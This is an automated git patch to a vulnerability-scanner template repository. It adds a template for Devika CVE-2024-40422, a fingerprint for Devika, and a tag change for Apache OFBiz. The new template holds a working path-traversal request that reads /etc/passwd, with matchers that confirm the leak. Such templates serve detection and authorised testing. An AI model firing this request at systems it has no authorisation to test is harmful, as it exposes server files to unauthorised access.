From 81fe54c84de29ab52d205af7609c8319c80fbdd3 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 9 Aug 2024 01:16:36 +0000 Subject: [PATCH] Auto Update Nuclei [Fri Aug 9 01:16:36 UTC 2024] :robot: --- plugins/apache/ofbiz/CVE-2024-38856.yaml | 2 +- plugins/stitionai/devika/CVE-2024-40422.yaml | 66 ++++++++++++++++++++ web-fingerprint/stitionai/devika.yaml | 20 ++++++ 3 files changed, 87 insertions(+), 1 deletion(-) create mode 100644 plugins/stitionai/devika/CVE-2024-40422.yaml create mode 100644 web-fingerprint/stitionai/devika.yaml diff --git a/plugins/apache/ofbiz/CVE-2024-38856.yaml b/plugins/apache/ofbiz/CVE-2024-38856.yaml index 1c301d3a0..2aa43a804 100644 --- a/plugins/apache/ofbiz/CVE-2024-38856.yaml +++ b/plugins/apache/ofbiz/CVE-2024-38856.yaml @@ -19,7 +19,7 @@ info: verified: true max-request: 1 fofa-query: app="Apache_OFBiz" - tags: cve,cve2024,ofbiz,apache,rce + tags: cve,cve2024,ofbiz,apache,rce,kev http: - raw: diff --git a/plugins/stitionai/devika/CVE-2024-40422.yaml b/plugins/stitionai/devika/CVE-2024-40422.yaml new file mode 100644 index 000000000..450fad8d8 --- /dev/null +++ b/plugins/stitionai/devika/CVE-2024-40422.yaml @@ -0,0 +1,66 @@ +id: CVE-2024-40422 + +info: + name: Devika v1 - Path Traversal + author: securityforeveryone,alpernae + severity: critical + description: | + The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-40422 + - https://cvefeed.io/vuln/detail/CVE-2024-40422 + - https://github.com/alpernae/CVE-2024-40422 + - https://github.com/stitionai/devika + - https://www.exploit-db.com/exploits/52066 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2024-40422 + cwe-id: CWE-22 + epss-score: 0.0087 + epss-percentile: 0.82513 + cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: stitionai + product: devika + fofa-query: icon_hash="-1429839495" + tags: cve,cve2024,devika,lfi + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /api/data HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"models","projects","OPENAI","OLLAMA")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + + - type: word + part: header + words: + - 'application/octet-stream' + + - type: status + status: + - 200 diff --git a/web-fingerprint/stitionai/devika.yaml b/web-fingerprint/stitionai/devika.yaml new file mode 100644 index 000000000..19d6657a9 --- /dev/null +++ b/web-fingerprint/stitionai/devika.yaml @@ -0,0 +1,20 @@ +id: devika +info: + name: devika + author: cn-kali-team + tags: detect,tech,devika + severity: info + metadata: + fofa-query: + - icon_hash="-1429839495" + product: devika + vendor: stitionai + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: favicon + hash: + - '-1429839495'